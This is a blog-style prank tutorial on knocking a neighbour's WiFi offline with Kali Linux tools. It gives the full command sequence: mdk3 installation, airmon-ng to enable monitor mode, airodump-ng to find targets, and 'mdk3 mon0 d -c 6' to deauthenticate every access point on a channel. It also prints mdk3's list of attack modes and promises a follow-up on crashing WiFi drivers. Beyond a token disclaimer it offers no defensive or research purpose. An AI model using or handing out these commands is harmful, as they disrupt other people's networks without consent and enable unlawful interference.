ad1

HOW TO IRRITATE YOUR NEIGHBORS part-1 ?


SO THIS IS JUST THE FUN ARTICLES! CAN BE USED AS A PRANK OR JUST  A LITTLE TRICK! 

 let your Neighbors have some good quality high speed WiFi installed and you are just annoyed seeing them enjoy!!!!!!!!!!!!! the high speed .


so u thought to turn off their WiFi <_> and see them running up down to check their router!! LOL

 JUST FOR FUN PURPOSE! I AM NOT RESPONSIBLE IF ANY DAMAGE HAPPENS!

So, with a feeling of HACKER you fire up your kali !

we need a tool named mdk3

is it installed in kali by default 
but if on other linux flavours you need to install by typing

apt-get install mdk3 

then in terminal type mdk3 

this output will come;

 
MDK 3.0 v6 - "Yeah, well, whatever"

MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.

MDK USAGE:
mdk3 <interface> <test_mode> [test_options]

TEST MODES:
b   - Beacon Flood Mode
      Sends beacon frames to show fake APs at clients.
      This can sometimes crash network scanners and even drivers!
a   - Authentication DoS mode
      Sends authentication frames to all APs found in range.
      Too many clients freeze or reset some APs.
p   - Basic probing and ESSID Bruteforce mode
      Probes AP and check for an answer, useful for checking if SSID has
      been correctly decloaked or if AP is in your adaptors sending range
      SSID Bruteforcing is also possible with this test mode.
d   - Deauthentication / Disassociation Amok Mode
      Kicks everybody  from AP
m   - Michael shutdown exploitation (TKIP)
      Cancels all traffic continuously
x   - 802.1X tests
w   - WIDS/WIPS Confusion
      Confuse/Abuse Intrusion Detection and Prevention Systems
f   - MAC filter bruteforce mode
      This test uses a list of known client MAC Adresses and tries to
      authenticate them to the given AP while dynamically changing
      its response timeout for best performance. It currently works only
      on APs who deny an open authentication request properly
g   - WPA Downgrade test
      deauthenticates Stations and APs sending WPA encrypted packets.
      With this test you can check if the sysadmin will try setting his
      network to WEP or disable encryption.


LETS JAM WIFI +_+ 

 

just follow the commands i tell! 
first set your wifi adapter to monitor mode-

by typing  

airmon-ng start wlan0


 
then we need the mac and channel number of the wifi we need to kick off!

so we need to monitor on signals!

type this command:

airodump-ng mon0

 
now lets kick off all the APs on channel number 6 . 

type this command 

mdk3 mon0 d -c 6

 
hence it will disconnect all APs on that channel!!!!!!!! pretty dirty and easy

thanks to kalilinuxtutorials.com for allowing me to use their pics :-) 


note: in my case the monitor mode name was mon0
          some will have wlan0mon just dont copy paste the commands! 

COMMENT DOWN IF U ENCOUNTER ANY PROBLEM. 

IN NEXT ARTICLE WILL BE SHOWING YOU HOW TO CRASH HARDWARE OF  WIFI SEARCH DRIVERS USING SAME TOOL!!! STAY TUNED. 

Comments

Popular Posts